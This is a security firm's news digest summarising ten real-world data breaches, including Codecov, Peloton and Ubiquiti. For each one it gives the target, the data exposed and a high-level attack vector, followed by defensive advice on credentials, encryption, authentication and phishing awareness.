Industry News: ESG5

The target: Bergen Logistics, a U.S based fulfillment provider.

The take: Personally Identifiable Information including: names, sur names, city, zip code, addresses, order numbers, email addresses, plain-text passwords to customer accounts.

The attack vector: An unsecured Elasticsearch database server was left online, meaning anyone with an internet connection was able to connect and download the data.

The exposure of personal information can lead to highly targeted phishing and fraud attacks. More critical was how this firm stored their customer account passwords in plain text on the server with no encryption or protections. Ensuring credentials are adequately and appropriately protected through encryption is an integral part of maintaining a robust cybersecurity posture.

Read more...

The target: FastTrack Reflex Recruitment, a U.K based online recruitment firm.

The take: Exposure of 20,000 records of personally identifiable information including: email addresses, home addresses, full names, phone numbers, dates of birth, and passport photos.

The attack vector: The information was exposed due to a misconfigured cloud storage account, allowing anyone with an internet connection to access and download a full copy of the details.

Leaving databases exposed to the internet without any credential management impacts its confidentiality, integrity, and availability. Taking the stance of using industry standard practices of password length, complexity, two-factor authentication, and email verification, will raise the level of protection needed for sensitive information.

Read more...

The target: The U.S based Fermilab Physics Laboratory

The take: Exposure of databases containing proprietary documents, project names, configuration files, passwords, and personality identifiable information such as employee names and emails.

The attack vector: Security researchers found wide open ports in Fermilab’s systems and were able to use these unprotected points of access to gain access to their IT ticketing support system and file transfer service. This led to further exposures of employee name and titles, as well as many sensitive documents attached to individual help tickets. Fermilab’s file transferring service was also online with no password protection.

This breach highlights the importance of credential management and thorough testing of points of access in a firm’s IT systems. All entry points should be secured through robust password controls, using the appropriate length and complexity, along with proper management and monitoring.

Read more...

The target: Peloton, an exercise equipment manufacturer.

The take: Exposure of an unknown number of its 3 million user’s personally identifiable information such as: user ID, instructor ID, location, workout statistics, gender and age, and studio check-ins.

The attack vector: The leak occurred due to lack of authentication and authorization controls in the API endpoints used in Peloton’s mobile app, website, and backend (An API is an Application Programming Interface, a software intermediary that allows two applications to exchange data). Unauthenticated individuals were able to manually send an API request and return profile information for Peloton users, even if those profiles were marked as ‘private’. 

This breach highlights critical importance of robust authentication whenever user data is being requested and transferred in a firm’s IT systems which are available to the public. Thorough testing of authentication protocols is an integral part of maintaining a rigorous cybersecurity posture. Exposed personal data can lead to extremely effective phishing attacks and further data breaches of a firm’s customers.

Read more...

The target: First Horizon Bank, a U.S based financial services company.

The take: An amount up to $1 million USD, and 200 online customer accounts with personally identifiable information.

The attack vector: The attacker used illicitly gained login credentials and exploited a vulnerability in third party security software, letting them access customer accounts and siphon funds. In additional to the funds stolen, the detailed personally identifiable data exposed is highly valuable for further phishing and fraud attacks.

This breach emphasizes the importance of controls around the authentication process – requirements for strong, unique credentials, and implementation of multiple factors of authentication wherever possible to mitigate stolen or brute-forced passwords. Third party software components in an authentication process must also be implemented properly, with security patches tested and applied in a timely manner to maintain a secure posture.

Read more...

The target: Codecov, a software company which provides code testing and code statistics.

The take: Security tokens and keys for 29,000 customers and employees, admin credentials, and application source code.

The attack vector: Attackers gained access to Codecov’s ‘Bash Uploader’ script, a method of uploading unencrypted data to Codecov’s servers used by clients and employees, through a previously unknown vulnerability which let them extract credentials with authority to modify the script. They then used these credentials to have all data sent to Codecov also be sent to their third-party server.

This breach highlights the importance of securing and testing applications and processes which interact with a firm’s data storage. Wherever information is uploaded, either by clients or employees, the method used should be highly scrutinized to ensure its security is in line with industry best practice and standards.

Read more...

The target: The Kentucky office of Unemployment Insurance.

The take: Unauthorized access to claimant accounts which had the ability to alter the destination bank accounts of the benefit payments, forwarding the funds to fraudsters.

The attack vector: Attackers leveraged the lack of robust password hygiene and modern credential management in Unemployment Office’s IT systems. It was reported that some 4000 users had created passwords such as “1-2-3-4” and 1500 used the phrase “2020”, both easily exploited with moderate computing power and password cracking applications.

Enforcing strong password management across all platforms is critical to protecting customer data. Industry standard practices of password length, complexity, two-factor authentication, and email verification will only be effective if these methods are enforced. Doing so will ensure users, and their data, are protected as much as possible.

Read more...

The target: Office Depot, a European online seller of office equipment

The take: 974,050 wide-ranging records of sensitive information including: monitoring logs, server IP addresses, secure remote login credentials, and customer’s personally identifiable information such as names, physical addresses, and order history. 

The attack vector: A non-password protected, unencrypted Elasticsearch database was left online, allowing anyone to access the information by entering the URL. 

Leaving databases exposed to the internet without any credential management impacts its confidentiality, integrity, and availability. Furthermore, collecting and storing sensitive data in plain text without encryption increases the risk to clients. In some cases, the database credentials needed to access the encrypted data is stored on the same server, rendering the encryption ineffective. Proper credential access, along with best encryption practices is essential in keeping data secure.

Read more...

The target: Ubiquiti, a major vendor of cloud-enabled networking devices. 

The take: Source code, customer data, and cryptographic secrets which would enable remote access to both professional and consumer-grade customer devices.

The attack vector: The attackers gained control of administrative credentials stored on an IT employee’s LastPass account. With these in hand, the threat actors gained high-level access to Ubiquiti Amazon Web Services accounts, including database storage servers, application logs, and user credentials. Multiple backdoor accounts were reportedly created. A whistleblower alleged that due to an absence of database access logging, Ubiquiti were unable to confirm which records had been accessed, by whom, and when.

While use of password vaults and privileged account management tools are absolutely a best practice, these tools can only be as secure as the authentication measures enforced upon them. Complex, unique passwords in addition to two-factor authentication should be in place wherever possible to protect privileged credentials and management consoles.

Additionally – comprehensive logging practices are critical to the reconstruction of events when investigating a breach, and the absence thereof can severely limit a firm’s the ability to determine the full scope of the attack.

Read more...

The target: California State Controller’s Office

The take: Financial and personally identifiable information and documents, such as Social Insurance Numbers, on several thousand employees.

The attack vector: An employee, the target of a spear phishing attack, clicked on a suspicious link and entered their account ID/email address and password. This gave the attacker full access to SCO’s systems with the same level of access the employee had, including any files shared with the affected account. From here, the attacker further launched phishing attempts against over 9000 employees, using the hacked account to increase the believability of the scam.

Phishing attacks against individual employees remain one of the greatest security threats to the entire organization. Regular social engineering and awareness testing and training, along with tone-from-the-top messaging to emphasize the importance of critical thinking and caution are crucial to protecting sensitive information assets.

Read more...